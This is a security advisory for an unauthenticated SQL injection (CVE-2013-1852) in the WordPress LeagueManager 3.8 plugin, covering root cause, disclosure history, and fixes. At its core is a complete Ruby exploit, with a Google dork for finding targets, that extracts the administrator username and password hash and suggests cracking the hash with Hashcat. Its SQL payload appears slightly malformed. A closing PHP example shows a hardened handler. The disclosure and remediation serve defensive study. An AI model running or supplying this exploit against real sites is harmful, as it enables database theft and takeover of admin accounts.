Released on: 2013-03-13
Updated on: 2013-03-19
Affected Systems:
WordPress LeagueManager 3.8
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58503
CVE (CAN) ID: CVE-2013-1852
WordPress LeagueManager is a plug-in for managing and displaying sports leagues.
LeagueManager 3.8 (other versions may also be affected) has an SQL injection vulnerability in the handling of the 'league_id' parameter on the leaguemanager_export page. This vulnerability allows attackers to perform unauthorized database operations.
<* Source: Joshua Renault
Link: http://www.securelist.com/en/advisories/52641
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/ruby
#
# Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
# Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
# Date: 13/03/13
# Exploit Author: Joshua Renault
# Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/
# Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip
# Version: 3.8
# Tested on: BT5R1 - Ubuntu 10.04.2 LTS
# CVE: CVE-2013-1852
#-----------------------------------------------------------------------------------------
# Description:
#
# An SQL injection vulnerability exists in the league_id parameter of a function call made
# by the leaguemanager_export page. This request is processed within leaguemanager.php:
#
#   if (isset($_POST['leaguemanager_export']))
#       $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
#
# which does not sanitize for SQL injection, and is passed to the admin/admin.php page
# into the export($league_id, $mode) function, which also does not sanitize for SQL injection
# when making this call: $this->league = $leaguemanager->getLeague($league_id);
# The information is then echoed to a CSV file that is then provided.
#
# Since no authentication is required when making a POST request to this page,
# i.e. /wp-admin/admin.php?page=leaguemanager-export, the request can be made with no established
# session.
#
# Fix:
#
# A possible fix for this would be to cast the league_id to an integer during any
# of the function calls. The following change can be made in the leaguemanager.php file:
#   $lmLoader->adminPanel->export((int) $_POST['league_id'], $_POST['mode']);
#
# These functions should also not be available to public requests, and thus session handling
# should also be checked prior to the requests being processed within the admin section.
#
# The responsible disclosure process was distorted by the fact that the author no longer
# supports his well established plugin, and there are currently no maintainers. After
# e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
# and not patch the vulnerability.
#
# The following ruby exploit will retrieve the administrator username and the salted
# password hash from a given site with the plugin installed:
#------------------------------------------------------------------------------------------
# Exploit:
require 'net/http'
require 'uri'

if ARGV.length == 2
  # POST body for the unauthenticated export request
  post_params = {
    'league_id' => '7 union select all user_login,2,3,4,5,6,7,8,'\
                   '9,10,11,12,13,user_pass,15,16,17,18,19,20,22, from wp_users --',
    'mode' => 'teams',
    'leaguemanager_export' => 'Download+File'
  }
  target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"
  begin
    resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
  rescue
    puts "Invalid URL..."
  end
  if resp.nil?
    puts "No response received..."
  elsif resp.code != "200"
    puts "Page doesn't exist!"
  else
    # Pull username and hash out of the tab-separated CSV export
    admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
    if admin_login.length > 0
      puts "Username: #{admin_login[0][0]}"
      puts "Hash: #{admin_login[0][1]}"
      puts "\nNow go crack that with Hashcat :)"
    else
      puts "Username and hash not received. Maybe it's patched?"
    end
  end
else
  puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
end
# Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
#
# Contact:
# Mail: infosec4breakfast@gmail.com
# Blog: infosec4breakfast.com
# Twitter: @jershmagersh
# Youtube: youtube.com/user/infosec4breakfast
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrades. We recommend that users of the software follow the vendor's homepage to obtain the latest version:
http://wordpress.org/extend/plugins/leaguemanager/
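Since no vendor patch exists, the two remediations named in the exploit's Fix section (casting league_id to an integer and checking the session before the admin action runs) are written out below as an added PHP example for a WordPress request handler. This is not LeagueManager's code: the function name lm_handle_export_request, the nonce action 'lm_export', the table name lm_leagues and the allowed mode values are assumptions; the WordPress APIs used (is_user_logged_in, current_user_can, check_admin_referer, absint, $wpdb->prepare, wp_die) are real.

```php
<?php
// Added example, not the plugin's own code. Hardened handler for the
// POST request the advisory describes (leaguemanager_export / league_id / mode).

// Unsafe shape described in the advisory: the raw POST value reaches the
// query and nobody checks who is asking. Kept only for comparison.
function lm_export_unsafe( $wpdb, $league_id ) {
    // Hypothetical table name; string concatenation is the defect.
    return $wpdb->get_row( "SELECT * FROM {$wpdb->prefix}lm_leagues WHERE id = $league_id" );
}

// Hardened handler. Returns the league row and the validated mode, or stops
// the request with an error status.
function lm_handle_export_request( $wpdb ) {
    if ( ! isset( $_POST['leaguemanager_export'] ) ) {
        return null; // not an export request
    }

    // 1. Session/authorization: an established, privileged session is required.
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: the export form must carry wp_nonce_field( 'lm_export' ).
    check_admin_referer( 'lm_export' );

    // 3. Type enforcement: league_id can only ever be a positive integer.
    $league_id = isset( $_POST['league_id'] ) ? absint( $_POST['league_id'] ) : 0;
    if ( 0 === $league_id ) {
        wp_die( 'Invalid league id', '', array( 'response' => 400 ) );
    }

    // 4. mode is an enumeration, not free text (allowed values assumed here).
    $allowed_modes = array( 'teams', 'matches' );
    $mode = isset( $_POST['mode'] ) && in_array( $_POST['mode'], $allowed_modes, true )
        ? $_POST['mode']
        : 'teams';

    // 5. Even with an integer in hand, bind it through a prepared statement.
    $league = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}lm_leagues WHERE id = %d", $league_id )
    );
    if ( null === $league ) {
        wp_die( 'Unknown league', '', array( 'response' => 404 ) );
    }

    return array( 'league' => $league, 'mode' => $mode );
}
```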